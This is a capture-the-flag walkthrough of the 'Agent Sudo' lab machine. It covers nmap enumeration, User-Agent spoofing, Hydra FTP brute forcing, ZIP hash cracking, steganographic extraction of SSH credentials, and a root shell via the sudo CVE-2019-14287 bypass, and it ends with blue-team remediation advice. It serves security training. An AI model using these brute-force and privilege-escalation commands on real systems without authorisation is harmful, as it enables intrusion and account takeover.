Target IP: agent.thm (Requires /etc/hosts entry) Difficulty: Easy (CTF-Heavy) Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Agent Sudo” is a Capture-The-Flag (CTF) focused machine that emphasizes Enumeration and Steganography. Initial access requires identifying a hidden context via User-Agent manipulation, followed by FTP credential brute-forcing. Identifying information hidden within images (Steganography) leads to SSH credentials. Privilege escalation exploits a logical vulnerability in Sudo (CVE-2019-14287), allowing a restricted user to execute commands as root by specifying a non-existent User ID (-1).

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port enumeration.
  • T1190 (Exploit Public-Facing App): Header manipulation (User-Agent) to bypass access controls.
  • T1110 (Brute Force): Hydra against FTP service.
  • T1027 (Obfuscated Files or Information): Steganography in image files.
  • T1068 (Exploitation for Privilege Escalation): Sudo Security Policy Bypass (CVE-2019-14287).

2. Operational Setup

OpSec Note: Always define your target in /etc/hosts. It prevents mistakes and makes your report readable.

Host Configuration

# Replace 10.10.x.x with the target IP
echo "10.10.x.x agent.thm" | sudo tee -a /etc/hosts

Workspace Preparation (Tmux)

  • Pane 1 (Recon): nmap, curl, gobuster.
  • Pane 2 (Tools): hydra, binwalk, steghide.
  • Pane 3 (Access): SSH connection.

3. Enumeration: “What do we see?”

A. Network Scanning

We start with a standard Nmap scan to identify the attack surface.

nmap -sC -sV -oA nmap/agent agent.thm

Results:

  • 21/tcp (FTP): vsftpd 3.0.3.
  • 22/tcp (SSH): OpenSSH 7.6p1.
  • 80/tcp (HTTP): Apache 2.4.29.

B. Web Enumeration & The “Hairan” Part

Visiting http://agent.thm shows a generic “Announce your codename” message. Standard directory brute-forcing (Gobuster/Feroxbuster) yields nothing.

The Logic: The site asks for a “codename.” In HTTP, clients identify themselves via the User-Agent header. If the site expects a specific “Agent,” we might need to change our identity.

The Discovery: You found that setting the User-Agent to “C” triggers a different response.

curl -I -A "C" http://agent.thm

Response:

Location: /agent_C_attention.php

Analysis: Navigating to agent_C_attention.php reveals a message:

“Chris, you need to use your own password… to upload the photos…”

  • Username Found: chris
  • Context: FTP (uploading photos).

4. Initial Access: The Chain

A. FTP Brute Force

We have a username (chris) and an open FTP port. Since we don’t have a password, we brute-force it.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://agent.thm -I
  • Result: Password found -> crystal.

B. Exfiltration

Login to FTP and download the evidence.

ftp agent.thm
# User: chris, Pass: crystal
binary      # Switch to binary mode (crucial for images)
mget * # Download all files (cutie.png, cute-alien.jpg)
bye

C. Steganography (The CTF Layer)

We have two images. We must check them for hidden data.

**File 1: cutie.png** We use binwalk to check for file signatures hidden inside the binary data.

binwalk -e cutie.png
  • Result: It extracts a ZIP file (8702.zip).
  • Challenge: The ZIP is password protected.

Cracking the ZIP:

zip2john _cutie.png.extracted/8702.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
  • Result: Password -> alien.
  • Content: To_agentR.txt containing a base64 string QXJlYTUx.
  • Decoding: echo "QXJlYTUx" | base64 -d -> “Area51”.

**File 2: cute-alien.jpg** Now we have a passphrase (“Area51”) and another image. We use steghide.

steghide extract -sf cute-alien.jpg -p Area51
  • Result: message.txt.
  • Credentials: james : hackerrules!

D. SSH Access

ssh james@agent.thm
# Password: hackerrules!
cat user.txt

5. Privilege Escalation: Sudo (CVE-2019-14287)

Enumeration

Always check sudo -l first.

sudo -l

Output:

(ALL, !root) /bin/bash

Analysis:

  • We can run /bin/bash as any user (ALL).
  • EXCEPT root (!root).

The Exploit Logic

This configuration is vulnerable to CVE-2019-14287. Sudo parses user IDs (UIDs). When you specify a user with -u, sudo checks if it’s allowed. However, if you pass the User ID -1 (or its unsigned equivalent 4294967295), the function that converts the string to a user ID returns -1. In the Sudo logic, -1 often means “no user ID specified” or “unchanged,” but essentially, it tricks Sudo into thinking “I am not choosing root (UID 0),” bypassing the !root check. However, the system eventually interprets -1 as 0 (root) when spawning the process.

Exploitation

sudo -u#-1 /bin/bash
  • Result: We drop into a root shell.
  • Flag: cat /root/root.txt.

6. Alternative Vectors & Extras

A. Manual “User-Agent” Hunting (Burp Suite)

If curl feels too manual, use Burp Suite Intruder.

  1. Capture the request to http://agent.thm.
  2. Send to Intruder.
  3. Highlight the User-Agent string.
  4. Payloads: A simple list A, B, C, D… or a dictionary of common Agent names.
  5. Look for changes in Content-Length or 3xx Redirects.

B. Cracking ZIPs (7z)

If binwalk fails you, 7z l cutie.png can sometimes see the file structure if it’s just concatenated.

C. OSINT (The Alien Photo)

You mentioned downloading Alien_autospy.jpg.

  • Action: scp james@agent.thm:Alien_autospy.jpg .
  • Google Lens: Uploading this image usually points to the “Roswell Incident” or “Fox Alien Autopsy.” This is lore, but in some CTFs, the “password” is the name of the incident or location found via OSINT.

7. Remediation (Blue Team)

  1. Patch Sudo:
  • Update sudo to version 1.8.28 or higher immediately. This bug allows simple bypass of restricted sudo profiles.
  1. Fix Web Logic:
  • Do not rely on User-Agent for authentication or hiding content. It is a client-controlled header and provides zero security.
  1. Secure FTP:
  • Disable FTP if not needed; use SFTP (over SSH) instead.
  • Enforce strong password policies to prevent hydra brute-forcing (chris:crystal is too weak).
  • Implement Fail2Ban to block repeated failed login attempts.